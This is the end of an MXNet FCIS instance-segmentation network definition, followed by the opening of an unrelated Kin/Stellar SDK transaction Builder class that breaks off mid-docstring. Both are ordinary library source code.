scale5c_branch2c = bn5c_branch2c res5c = mx.symbol.broadcast_add(name='res5c', *[res5b_relu, scale5c_branch2c]) res5c_relu = mx.symbol.Activation(name='res5c_relu', data=res5c, act_type='relu') return res5c_relu def get_rpn(self, conv_feat, num_anchors): rpn_conv = mx.sym.Convolution( data=conv_feat, kernel=(3, 3), pad=(1, 1), num_filter=512, name="rpn_conv_3x3") rpn_relu = mx.sym.Activation(data=rpn_conv, act_type="relu", name="rpn_relu") rpn_cls_score = mx.sym.Convolution( data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=2 * num_anchors, name="rpn_cls_score") rpn_bbox_pred = mx.sym.Convolution( data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=4 * num_anchors, name="rpn_bbox_pred") return rpn_cls_score, rpn_bbox_pred def get_symbol(self, cfg, is_train=True): # config alias for convenient num_classes = cfg.dataset.NUM_CLASSES num_reg_classes = (2 if cfg.CLASS_AGNOSTIC else num_classes) num_anchors = cfg.network.NUM_ANCHORS # input init if is_train: data = mx.sym.Variable(name='data') im_info = mx.sym.Variable(name='im_info') gt_boxes = mx.sym.Variable(name='gt_boxes') gt_masks = mx.sym.Variable(name='gt_masks') rpn_label = mx.sym.Variable(name='proposal_label') rpn_bbox_target = mx.sym.Variable(name='proposal_bbox_target') rpn_bbox_weight = mx.sym.Variable(name='proposal_bbox_weight') else: data = mx.sym.Variable(name="data") im_info = mx.sym.Variable(name="im_info") # shared convolutional layers conv_feat = self.get_resnet_v1_conv4(data) # res5 relu1 = self.get_resnet_v1_conv5(conv_feat) rpn_cls_score, rpn_bbox_pred = self.get_rpn(conv_feat, num_anchors) if is_train: # prepare rpn data rpn_cls_score_reshape = mx.sym.Reshape( data=rpn_cls_score, shape=(0, 2, -1, 0), name="rpn_cls_score_reshape") # classification rpn_cls_prob = mx.sym.SoftmaxOutput(data=rpn_cls_score_reshape, label=rpn_label, multi_output=True, normalization='valid', use_ignore=True, ignore_label=-1, name="rpn_cls_prob") # bounding box regression rpn_bbox_loss_ = rpn_bbox_weight * mx.sym.smooth_l1(name='rpn_bbox_loss_', scalar=3.0, data=(rpn_bbox_pred - rpn_bbox_target)) rpn_bbox_loss = mx.sym.MakeLoss(name='rpn_bbox_loss', data=rpn_bbox_loss_, grad_scale=1.0 / cfg.TRAIN.RPN_BATCH_SIZE) # ROI proposal rpn_cls_act = mx.sym.SoftmaxActivation( data=rpn_cls_score_reshape, mode="channel", name="rpn_cls_act") rpn_cls_act_reshape = mx.sym.Reshape( data=rpn_cls_act, shape=(0, 2 * num_anchors, -1, 0), name='rpn_cls_act_reshape') if cfg.TRAIN.CXX_PROPOSAL: rois = mx.contrib.sym.Proposal( cls_prob=rpn_cls_act_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', feature_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TRAIN.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TRAIN.RPN_POST_NMS_TOP_N, threshold=cfg.TRAIN.RPN_NMS_THRESH, rpn_min_size=cfg.TRAIN.RPN_MIN_SIZE) else: rois = mx.sym.Custom( cls_prob=rpn_cls_act_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', op_type='proposal', feat_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TRAIN.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TRAIN.RPN_POST_NMS_TOP_N, nms_threshold=cfg.TRAIN.RPN_NMS_THRESH, rpn_min_size=cfg.TRAIN.RPN_MIN_SIZE) # ROI proposal target gt_boxes_reshape = mx.sym.Reshape(data=gt_boxes, shape=(-1, 5), name='gt_boxes_reshape') group = mx.sym.Custom(rois=rois, gt_boxes=gt_boxes_reshape, gt_masks=gt_masks, op_type='proposal_annotator', num_classes=num_reg_classes, mask_size=cfg.MASK_SIZE, binary_thresh=cfg.TRAIN.BINARY_THRESH, batch_images=cfg.TRAIN.BATCH_IMAGES, cfg=cPickle.dumps(cfg), batch_rois=cfg.TRAIN.BATCH_ROIS, fg_fraction=cfg.TRAIN.FG_FRACTION) rois = group[0] label = group[1] bbox_target = group[2] bbox_weight = group[3] mask_reg_targets = group[4] else: # ROI Proposal rpn_cls_score_reshape = mx.sym.Reshape( data=rpn_cls_score, shape=(0, 2, -1, 0), name="rpn_cls_score_reshape") rpn_cls_prob = mx.sym.SoftmaxActivation( data=rpn_cls_score_reshape, mode="channel", name="rpn_cls_prob") rpn_cls_prob_reshape = mx.sym.Reshape( data=rpn_cls_prob, shape=(0, 2 * num_anchors, -1, 0), name='rpn_cls_prob_reshape') if cfg.TEST.CXX_PROPOSAL: rois = mx.contrib.sym.Proposal( cls_prob=rpn_cls_prob_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', feature_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TEST.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TEST.RPN_POST_NMS_TOP_N, threshold=cfg.TEST.RPN_NMS_THRESH, rpn_min_size=cfg.TEST.RPN_MIN_SIZE) else: rois = mx.sym.Custom( cls_prob=rpn_cls_prob_reshape, bbox_pred=rpn_bbox_pred, im_info=im_info, name='rois', op_type='proposal', feat_stride=cfg.network.RPN_FEAT_STRIDE, scales=tuple(cfg.network.ANCHOR_SCALES), ratios=tuple(cfg.network.ANCHOR_RATIOS), rpn_pre_nms_top_n=cfg.TEST.RPN_PRE_NMS_TOP_N, rpn_post_nms_top_n=cfg.TEST.RPN_POST_NMS_TOP_N, nms_threshold=cfg.TEST.RPN_NMS_THRESH, rpn_min_size=cfg.TEST.RPN_MIN_SIZE) # conv new 1 if cfg.TRAIN.CONVNEW3: conv_new_1 = mx.sym.Convolution(data=relu1, kernel=(1, 1), num_filter=1024, name='conv_new_1', attr={'lr_mult':'3.00'}) else: conv_new_1 = mx.sym.Convolution(data=relu1, kernel=(1, 1), num_filter=1024, name='conv_new_1') relu_new_1 = mx.sym.Activation(data=conv_new_1, act_type='relu', name='relu_new_1') fcis_cls_seg = mx.sym.Convolution(data=relu_new_1, kernel=(1, 1), num_filter=7*7*num_classes*2, name='fcis_cls_seg') fcis_bbox = mx.sym.Convolution(data=relu_new_1, kernel=(1, 1), num_filter=7*7*4*num_reg_classes, name='fcis_bbox') psroipool_cls_seg = mx.contrib.sym.PSROIPooling(name='psroipool_cls_seg', data=fcis_cls_seg, rois=rois, group_size=7, pooled_size=21, output_dim=num_classes*2, spatial_scale=0.0625) psroipool_bbox_pred = mx.contrib.sym.PSROIPooling(name='psroipool_bbox', data=fcis_bbox, rois=rois, group_size=7, pooled_size=21, output_dim=num_reg_classes*4, spatial_scale=0.0625) if is_train: # classification path psroipool_cls = mx.contrib.sym.ChannelOperator(name='psroipool_cls', data=psroipool_cls_seg, group=num_classes, op_type='Group_Max') cls_score = mx.sym.Pooling(name='cls_score', data=psroipool_cls, pool_type='avg', global_pool=True, kernel=(21, 21)) cls_score = mx.sym.Reshape(name='cls_score_reshape', data=cls_score, shape=(-1, num_classes)) # mask regression path label_seg = mx.sym.Reshape(name='label_seg', data=label, shape=(-1, 1, 1, 1)) seg_pred = mx.contrib.sym.ChannelOperator(name='seg_pred', data=psroipool_cls_seg, pick_idx=label_seg, group=num_classes, op_type='Group_Pick', pick_type='Label_Pick') # bbox regression path bbox_pred = mx.sym.Pooling(name='bbox_pred', data=psroipool_bbox_pred, pool_type='avg', global_pool=True, kernel=(21, 21)) bbox_pred = mx.sym.Reshape(name='bbox_pred_reshape', data=bbox_pred, shape=(-1, 4 * num_reg_classes)) else: # classification path psroipool_cls = mx.contrib.sym.ChannelOperator(name='psroipool_cls', data=psroipool_cls_seg, group=num_classes, op_type='Group_Max') cls_score = mx.sym.Pooling(name='cls_score', data=psroipool_cls, pool_type='avg', global_pool=True, kernel=(21, 21)) cls_score = mx.sym.Reshape(name='cls_score_reshape', data=cls_score, shape=(-1, num_classes)) cls_prob = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score) # mask regression path score_seg = mx.sym.Reshape(name='score_seg', data=cls_prob, shape=(-1, num_classes, 1, 1)) seg_softmax = mx.contrib.sym.ChannelOperator(name='seg_softmax', data=psroipool_cls_seg, group=num_classes, op_type='Group_Softmax') seg_pred = mx.contrib.sym.ChannelOperator(name='seg_pred', data=seg_softmax, pick_idx=score_seg, group=num_classes, op_type='Group_Pick', pick_type='Score_Pick') # bbox regression path bbox_pred = mx.sym.Pooling(name='bbox_pred', data=psroipool_bbox_pred, pool_type='avg', global_pool=True, kernel=(21, 21)) bbox_pred = mx.sym.Reshape(name='bbox_pred_reshape', data=bbox_pred, shape=(-1, 4 * num_reg_classes)) if is_train: if cfg.TRAIN.ENABLE_OHEM: labels_ohem, mask_targets_ohem, bbox_weights_ohem = mx.sym.Custom(op_type='BoxAnnotatorOHEM', num_classes=num_classes, num_reg_classes=num_reg_classes, roi_per_img=cfg.TRAIN.BATCH_ROIS_OHEM, cfg=cPickle.dumps(cfg), cls_score=cls_score, seg_pred=seg_pred, bbox_pred=bbox_pred, labels=label, mask_targets=mask_reg_targets, bbox_targets=bbox_target, bbox_weights=bbox_weight) cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=labels_ohem, normalization='valid', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[0]) seg_prob = mx.sym.SoftmaxOutput(name='seg_prob', data=seg_pred, label=mask_targets_ohem, multi_output=True, normalization='null', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[1] / cfg.TRAIN.BATCH_ROIS_OHEM) bbox_loss_t = bbox_weights_ohem * mx.sym.smooth_l1(name='bbox_loss_t', scalar=1.0, data=(bbox_pred - bbox_target)) bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_t, grad_scale=cfg.TRAIN.LOSS_WEIGHT[2] / cfg.TRAIN.BATCH_ROIS_OHEM) rcnn_label = labels_ohem else: cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=label, normalization='valid', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[0]) seg_prob = mx.sym.SoftmaxOutput(name='seg_prob', data=seg_pred, label=mask_reg_targets, multi_output=True, normalization='null', use_ignore=True, ignore_label=-1, grad_scale=cfg.TRAIN.LOSS_WEIGHT[1] / cfg.TRAIN.BATCH_ROIS) bbox_loss_t = bbox_weight * mx.sym.smooth_l1(name='bbox_loss_t', scalar=1.0, data=(bbox_pred - bbox_target)) bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_t, grad_scale=cfg.TRAIN.LOSS_WEIGHT[2] / cfg.TRAIN.BATCH_ROIS) rcnn_label = label rcnn_label = mx.sym.Reshape(data=rcnn_label, shape=(cfg.TRAIN.BATCH_IMAGES, -1), name='label_reshape') cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TRAIN.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape') bbox_loss = mx.sym.Reshape(data=bbox_loss, shape=(cfg.TRAIN.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_loss_reshape') group = mx.sym.Group([rpn_cls_prob, rpn_bbox_loss, cls_prob, bbox_loss, seg_prob, mx.sym.BlockGrad(mask_reg_targets), mx.sym.BlockGrad(rcnn_label)]) else: cls_prob = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score) if cfg.TEST.ITER == 2: rois_iter2 = mx.sym.Custom(bottom_rois=rois, bbox_delta=bbox_pred, im_info=im_info, cls_prob=cls_prob, name='rois_iter2', b_clip_boxes=True, bbox_class_agnostic=True, bbox_means=tuple(cfg.TRAIN.BBOX_MEANS), bbox_stds=tuple(cfg.TRAIN.BBOX_STDS), op_type='BoxParser') # rois = mx.sym.Concat(*[rois, rois_iter2], dim=0, name='rois') psroipool_cls_seg_iter2 = mx.contrib.sym.PSROIPooling(name='psroipool_cls_seg', data=fcis_cls_seg, rois=rois_iter2, group_size=7, pooled_size=21, output_dim=num_classes*2, spatial_scale=0.0625) psroipool_bbox_pred_iter2 = mx.contrib.sym.PSROIPooling(name='psroipool_bbox', data=fcis_bbox, rois=rois_iter2, group_size=7, pooled_size=21, output_dim=num_reg_classes*4, spatial_scale=0.0625) # classification path psroipool_cls_iter2 = mx.contrib.sym.ChannelOperator(name='psroipool_cls', data=psroipool_cls_seg_iter2, group=num_classes, op_type='Group_Max') cls_score_iter2 = mx.sym.Pooling(name='cls_score', data=psroipool_cls_iter2, pool_type='avg', global_pool=True, kernel=(21, 21), stride=(21,21)) cls_score_iter2 = mx.sym.Reshape(name='cls_score_reshape', data=cls_score_iter2, shape=(-1, num_classes)) cls_prob_iter2 = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score_iter2) # mask regression path score_seg_iter2 = mx.sym.Reshape(name='score_seg', data=cls_prob_iter2, shape=(-1, num_classes, 1, 1)) seg_softmax_iter2 = mx.contrib.sym.ChannelOperator(name='seg_softmax', data=psroipool_cls_seg_iter2, group=num_classes, op_type='Group_Softmax') seg_pred_iter2 = mx.contrib.sym.ChannelOperator(name='seg_pred', data=seg_softmax_iter2, pick_idx=score_seg_iter2, group=num_classes, op_type='Group_Pick', pick_type='Score_Pick') # bbox regression path bbox_pred_iter2 = mx.sym.Pooling(name='bbox_pred', data=psroipool_bbox_pred_iter2, pool_type='avg', global_pool=True, kernel=(21, 21), stride=(21,21)) bbox_pred_iter2 = mx.sym.Reshape(name='bbox_pred_reshape', data=bbox_pred_iter2, shape=(-1, 4 * num_reg_classes)) rois = mx.sym.Concat(*[rois, rois_iter2], dim=0, name='rois') cls_prob = mx.sym.Concat(*[cls_prob, cls_prob_iter2], dim=0, name='cls_prob') seg_pred = mx.sym.Concat(*[seg_pred, seg_pred_iter2], dim=0, name='seg_pred') bbox_pred = mx.sym.Concat(*[bbox_pred, bbox_pred_iter2], dim=0, name='box_pred') # reshape output cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TEST.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape') bbox_pred = mx.sym.Reshape(data=bbox_pred, shape=(cfg.TEST.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_pred_reshape') group = mx.sym.Group([rois, cls_prob, bbox_pred, seg_pred]) self.sym = group return group def init_weight(self, cfg, arg_params, aux_params): arg_params['rpn_conv_3x3_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['rpn_conv_3x3_weight']) arg_params['rpn_conv_3x3_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['rpn_conv_3x3_bias']) arg_params['rpn_cls_score_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['rpn_cls_score_weight']) arg_params['rpn_cls_score_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['rpn_cls_score_bias']) arg_params['rpn_bbox_pred_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['rpn_bbox_pred_weight']) arg_params['rpn_bbox_pred_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['rpn_bbox_pred_bias']) arg_params['conv_new_1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['conv_new_1_weight']) arg_params['conv_new_1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['conv_new_1_bias']) arg_params['fcis_cls_seg_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fcis_cls_seg_weight']) arg_params['fcis_cls_seg_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fcis_cls_seg_bias']) arg_params['fcis_bbox_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fcis_bbox_weight']) arg_params['fcis_bbox_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fcis_bbox_bias'])
the-stack_106_24314
# coding: utf-8 import binascii import warnings from .asset import Asset from .keypair import Keypair from . import memo from .network import NETWORKS, Network from . import operation from .transaction import Transaction from .transaction_envelope import TransactionEnvelope as Te from .exceptions import SequenceError from .horizon import Horizon from .operation import Operation from typing import Union, Optional, TypeVar T = TypeVar('T', bound='Builder') class Builder: """The :class:`Builder` object, which uses the builder pattern to create a list of operations in a :class:`Transaction`, ultimately to be submitted as a :class:`TransactionEnvelope` to the network via Horizon (see :class:`Horizon`). :param secret: The base32 secret seed for the source address. :param horizon: The horizon instance to use for submitting the created transaction. :param network_name: The network to connect to for verifying and retrieving additional attributes from. 'PUBLIC' is an alias for 'Public Global Stellar Network ; September 2015', 'TESTNET' is an alias for 'Test SDF Network ; September 2015'. Defaults to TESTNET. :param sequence: The sequence number to use for submitting this transaction with (must be the *current* sequence number of the source account) :param fee: The network base fee is currently set to 100 stroops (0.00001 lumens). Transaction fee is equal to base fee times number of operations in this transaction. """ def __init__(self, horizon: Horizon, network_name: str, fee: int, secret: str, sequence: Optional[Union[int, str]] = None): # TODO: get keypair instead of seed, no need to do cryptographic operation on every build self.keypair = Keypair.from_seed(secret) self.address = self.keypair.address().decode() self.network_name = network_name self.horizon = horizon self.sequence = sequence self.ops = [] self.time_bounds = None self.memo = memo.NoneMemo() self.fee = fee self.tx = None self.te = None def append_op(self, operation: Operation) -> 'Builder': """Append an :class:`Operation <kin_base.operation.Operation>` to the list of operations. Add the operation specified if it doesn't already exist in the list of operations of this :class:`Builder` instance. :param operation: The operation to append to the list of operations. :return: This builder instance. """ if operation not in self.ops: self.ops.append(operation) return self def append_create_account_op(self, destination: str, starting_balance: str, source: Optional[str] = None) -> 'Builder': """Append a :class:`CreateAccount <kin_base.operation.CreateAccount>` operation to the list of operations. :param destination: Account address that is created and funded. :param starting_balance: Amount of KIN to send to the newly created account. This KIN comes from the source account. :param source: The source address to deduct funds from to fund the new account. :return: This builder instance. """ op = operation.CreateAccount(destination, starting_balance, source) return self.append_op(op) def append_trust_op(self, destination, code, limit=None, source=None): """append_trust_op will be deprecated in the future, use append_change_trust_op instead. Append a :class:`ChangeTrust <kin_base.operation.ChangeTrust>` operation to the list of operations. :param str destination: The issuer address for the asset. :param str code: The asset code for the asset. :param str limit: The limit of the new trustline. :param str source: The source address to add the trustline to. :return: This builder instance. """ warnings.warn( "append_trust_op will be deprecated in the future, use append_change_trust_op instead.", PendingDeprecationWarning ) return self.append_change_trust_op(asset_code=code, asset_issuer=destination, limit=limit, source=source) def append_change_trust_op(self, asset_code: str, asset_issuer: str, limit: Optional[str] = None, source: Optional[str] = None) -> 'Builder': """Append a :class:`ChangeTrust <kin_base.operation.ChangeTrust>` operation to the list of operations. :param asset_issuer: The issuer address for the asset. :param asset_code: The asset code for the asset. :param limit: The limit of the new trustline. :param source: The source address to add the trustline to. :return: This builder instance. """ asset = Asset(asset_code, asset_issuer) op = operation.ChangeTrust(asset, limit, source) return self.append_op(op) def append_payment_op(self, destination: str, amount: str, asset_code: Optional[str] = 'KIN', asset_issuer: Optional[str] = None, source: Optional[str] = None) -> 'Builder': """Append a :class:`Payment <kin_base.operation.Payment>` operation to the list of operations. :param destination: Account address that receives the payment. :param amount: The amount of the currency to send in the payment. :param asset_code: The asset code for the asset to send. :param asset_issuer: The address of the issuer of the asset. :param source: The source address of the payment. :return: This builder instance. """ asset = Asset(code=asset_code, issuer=asset_issuer) op = operation.Payment(destination, asset, amount, source) return self.append_op(op) def append_path_payment_op(self, destination, send_code, send_issuer, send_max, dest_code, dest_issuer, dest_amount, path, source=None): """Append a :class:`PathPayment <kin_base.operation.PathPayment>` operation to the list of operations. :param str destination: The destination address (Account ID) for the payment. :param str send_code: The asset code for the source asset deducted from the source account. :param send_issuer: The address of the issuer of the source asset. :type send_issuer: str, None :param str send_max: The maximum amount of send asset to deduct (excluding fees). :param str dest_code: The asset code for the final destination asset sent to the recipient. :param dest_issuer: Account address that receives the payment. :type dest_issuer: str, None :param str dest_amount: The amount of destination asset the destination account receives. :param list path: A list of asset tuples, each tuple containing a (asset_code, asset_issuer) for each asset in the path. For the native asset, `None` is used for the asset_issuer. :param str source: The source address of the path payment. :return: This builder instance. """ # path: a list of asset tuple which contains asset_code and asset_issuer, # [(asset_code, asset_issuer), (asset_code, asset_issuer)] for native asset you can deliver # ('KIN', None) send_asset = Asset(send_code, send_issuer) dest_asset = Asset(dest_code, dest_issuer) assets = [] for p in path: assets.append(Asset(p[0], p[1])) op = operation.PathPayment(destination, send_asset, send_max, dest_asset, dest_amount, assets, source) return self.append_op(op) def append_allow_trust_op(self, trustor, asset_code, authorize, source=None): """Append an :class:`AllowTrust <kin_base.operation.AllowTrust>` operation to the list of operations. :param str trustor: The account of the recipient of the trustline. :param str asset_code: The asset of the trustline the source account is authorizing. For example, if an anchor wants to allow another account to hold its USD credit, the type is USD:anchor. :param bool authorize: Flag indicating whether the trustline is authorized. :param str source: The source address that is establishing the trust in the allow trust operation. :return: This builder instance. """ op = operation.AllowTrust(trustor, asset_code, authorize, source) return self.append_op(op) def append_set_options_op(self, inflation_dest: Optional[str] = None, clear_flags: Optional[int] = None, set_flags: Optional[int] = None, master_weight: Optional[int] = None, low_threshold: Optional[int] = None, med_threshold: Optional[int] = None, high_threshold: Optional[int] = None, home_domain: Optional[str] = None, signer_address: Optional[str] = None, signer_type: Optional[str] = None, signer_weight: Optional[int] = None, source: Optional[str] = None) -> 'Builder': """Append a :class:`SetOptions <kin_base.operation.SetOptions>` operation to the list of operations. .. _Accounts: https://www.stellar.org/developers/guides/concepts/accounts.html :param inflation_dest: The address in which to send inflation to on an :class:`Inflation <kin_base.operation.Inflation>` operation. :param clear_flags: Indicates which flags to clear. For details about the flags, please refer to Stellar's documentation on `Accounts`_. The bit mask integer subtracts from the existing flags of the account. This allows for setting specific bits without knowledge of existing flags. :param set_flags: Indicates which flags to set. For details about the flags, please refer to Stellar's documentation on `Accounts`_. The bit mask integer adds onto the existing flags of the account. This allows for setting specific bits without knowledge of existing flags. :param master_weight: Weight of the master key. This account may also add other keys with which to sign transactions using the signer param. :param low_threshold: A number from 0-255 representing the threshold this account sets on all operations it performs that have a `low threshold <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_. :param med_threshold: A number from 0-255 representing the threshold this account sets on all operations it performs that have a `medium threshold <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_. :param high_threshold: A number from 0-255 representing the threshold this account sets on all operations it performs that have a `high threshold <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_. :param home_domain: Sets the home domain of an account. See Stellar's documentation on `Federation <https://www.stellar.org/developers/guides/concepts/federation.html>`_. :param signer_address: The address of the new signer to add to the source account. :param signer_type: The type of signer to add to the account. Must be in ('ed25519PublicKey', 'hashX', 'preAuthTx'). See Stellar's documentation for `Multi-Sign <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_ for more information. :param signer_weight: The weight of the signer. If the weight is 0, the signer will be deleted. :param source: The source address for which options are being set. :return: This builder instance. """ op = operation.SetOptions(inflation_dest, clear_flags, set_flags, master_weight, low_threshold, med_threshold, high_threshold, home_domain, signer_address, signer_type, signer_weight, source) return self.append_op(op) def append_hashx_signer(self, hashx, signer_weight, source=None): """Add a HashX signer to an account. Add a HashX signer to an account via a :class:`SetOptions <kin_base.operation.SetOptions` operation. This is a helper function for :meth:`append_set_options_op`. :param hashx: The address of the new hashX signer. :type hashx: str, bytes :param int signer_weight: The weight of the new signer. :param str source: The source account that is adding a signer to its list of signers. :return: This builder instance. """ return self.append_set_options_op( signer_address=hashx, signer_type='hashX', signer_weight=signer_weight, source=source) def append_pre_auth_tx_signer(self, pre_auth_tx, signer_weight, source=None): """Add a PreAuthTx signer to an account. Add a PreAuthTx signer to an account via a :class:`SetOptions <kin_base.operation.SetOptions` operation. This is a helper function for :meth:`append_set_options_op`. :param pre_auth_tx: The address of the new preAuthTx signer - obtained by calling `hash_meta` on the TransactionEnvelope. :type pre_auth_tx: str, bytes :param int signer_weight: The weight of the new signer. :param str source: The source account that is adding a signer to its list of signers. :return: This builder instance. """ return self.append_set_options_op( signer_address=pre_auth_tx, signer_type='preAuthTx', signer_weight=signer_weight, source=source) def append_manage_offer_op(self, selling_code, selling_issuer, buying_code, buying_issuer, amount, price, offer_id=0, source=None): """Append a :class:`ManageOffer <kin_base.operation.ManageOffer>` operation to the list of operations. :param str selling_code: The asset code for the asset the offer creator is selling. :param selling_issuer: The issuing address for the asset the offer creator is selling. :type selling_issuer: str, None :param str buying_code: The asset code for the asset the offer creator is buying. :param buying_issuer: The issuing address for the asset the offer creator is selling. :type buying_issuer: str, None :param str amount: Amount of the asset being sold. Set to 0 if you want to delete an existing offer. :param price: Price of 1 unit of selling in terms of buying. You can pass in a number as a string or a dict like `{n: numerator, d: denominator}` :type price: str, dict :param int offer_id: The ID of the offer. 0 for new offer. Set to existing offer ID to update or delete. :param str source: The source address that is managing an offer on Stellar's distributed exchange. :return: This builder instance. """ selling = Asset(selling_code, selling_issuer) buying = Asset(buying_code, buying_issuer) op = operation.ManageOffer(selling, buying, amount, price, offer_id, source) return self.append_op(op) def append_create_passive_offer_op(self, selling_code, selling_issuer, buying_code, buying_issuer, amount, price, source=None): """Append a :class:`CreatePassiveOffer <kin_base.operation.CreatePassiveOffer>` operation to the list of operations. :param str selling_code: The asset code for the asset the offer creator is selling. :param selling_issuer: The issuing address for the asset the offer creator is selling. :type selling_issuer: str, None :param str buying_code: The asset code for the asset the offer creator is buying. :param buying_issuer: The issuing address for the asset the offer creator is selling. :type buying_issuer: str, None :param str amount: Amount of the asset being sold. Set to 0 if you want to delete an existing offer. :param price: Price of 1 unit of selling in terms of buying. You can pass in a number as a string or a dict like `{n: numerator, d: denominator}` :type price: str, dict :param str source: The source address that is creating a passive offer on Stellar's distributed exchange. :return: This builder instance. """ selling = Asset(selling_code, selling_issuer) buying = Asset(buying_code, buying_issuer) op = operation.CreatePassiveOffer(selling, buying, amount, price, source) return self.append_op(op) def append_account_merge_op(self, destination, source=None): """Append a :class:`AccountMerge <kin_base.operation.AccountMerge>` operation to the list of operations. :param str destination: The ID of the offer. 0 for new offer. Set to existing offer ID to update or delete. :param str source: The source address that is being merged into the destination account. :return: This builder instance. """ op = operation.AccountMerge(destination, source) return self.append_op(op) def append_inflation_op(self, source=None): """Append a :class:`Inflation <kin_base.operation.Inflation>` operation to the list of operations. :param str source: The source address that is running the inflation operation. :return: This builder instance. """ op = operation.Inflation(source) return self.append_op(op) def append_manage_data_op(self, data_name: str, data_value: Union[str, bytes, None], source: Optional[str] = None) -> 'Builder': """Append a :class:`ManageData <kin_base.operation.ManageData>` operation to the list of operations. :param data_name: String up to 64 bytes long. If this is a new Name it will add the given name/value pair to the account. If this Name is already present then the associated value will be modified. :param data_value: If not present then the existing Name will be deleted. If present then this value will be set in the DataEntry. Up to 64 bytes long. :param source: The source account on which data is being managed. operation. :return: This builder instance. """ op = operation.ManageData(data_name, data_value, source) return self.append_op(op) def append_bump_sequence_op(self, bump_to, source=None): """Append a :class:`BumpSequence <kin_base.operation.BumpSequence>` operation to the list of operations. Only available in protocol version 10 and above :param int bump_to: Sequence number to bump to. :param str source: The source address that is running the inflation operation. :return: This builder instance. """ op = operation.BumpSequence(bump_to, source) return self.append_op(op) def add_memo(self, memo): """Set the memo for the transaction build by this :class:`Builder`. :param memo: A memo to add to this transaction. :type memo: :class:`Memo <kin_base.memo.Memo>` :return: This builder instance. """ self.memo = memo return self def add_text_memo(self, memo_text: str): """Set the memo for the transaction to a new :class:`TextMemo <kin_base.memo.TextMemo>`. :param memo_text: The text for the memo to add. :return: This builder instance. """ memo_text = memo.TextMemo(memo_text) return self.add_memo(memo_text) def add_id_memo(self, memo_id): """Set the memo for the transaction to a new :class:`IdMemo <kin_base.memo.IdMemo>`. :param int memo_id: A 64 bit unsigned integer to set as the memo. :return: This builder instance. """ memo_id = memo.IdMemo(memo_id) return self.add_memo(memo_id) def add_hash_memo(self, memo_hash): """Set the memo for the transaction to a new :class:`HashMemo <kin_base.memo.HashMemo>`. :param memo_hash: A 32 byte hash or hex encoded string to use as the memo. :type memo_hash: bytes, str :return: This builder instance. """ memo_hash = memo.HashMemo(memo_hash) return self.add_memo(memo_hash) def add_ret_hash_memo(self, memo_return): """Set the memo for the transaction to a new :class:`RetHashMemo <kin_base.memo.RetHashMemo>`. :param bytes memo_return: A 32 byte hash or hex encoded string intended to be interpreted as the hash of the transaction the sender is refunding. :type memo_return: bytes, str :return: This builder instance. """ memo_return = memo.RetHashMemo(memo_return) return self.add_memo(memo_return) def add_time_bounds(self, time_bounds): """Add a time bound to this transaction. Add a UNIX timestamp, determined by ledger time, of a lower and upper bound of when this transaction will be valid. If a transaction is submitted too early or too late, it will fail to make it into the transaction set. maxTime equal 0 means that it's not set. :param dict time_bounds: A dict that contains a minTime and maxTime attribute (`{'minTime': 1534392138, 'maxTime': 1534392238}`) representing the lower and upper bound of when a given transaction will be valid. :return: This builder instance. """ self.time_bounds = time_bounds return self def gen_tx(self): """Generate a :class:`Transaction <kin_base.transaction.Transaction>` object from the list of operations contained within this object. :return: A transaction representing all of the operations that have been appended to this builder. :rtype: :class:`Transaction <kin_base.transaction.Transaction>` """ if not self.sequence: raise SequenceError('No sequence is present, maybe not funded?') tx = Transaction( source=self.address, sequence=self.sequence, time_bounds=self.time_bounds, memo=self.memo, fee=self.fee * len(self.ops), operations=self.ops) self.tx = tx return tx def gen_te(self): """Generate a :class:`TransactionEnvelope <kin_base.transaction_envelope.TransactionEnvelope>` around 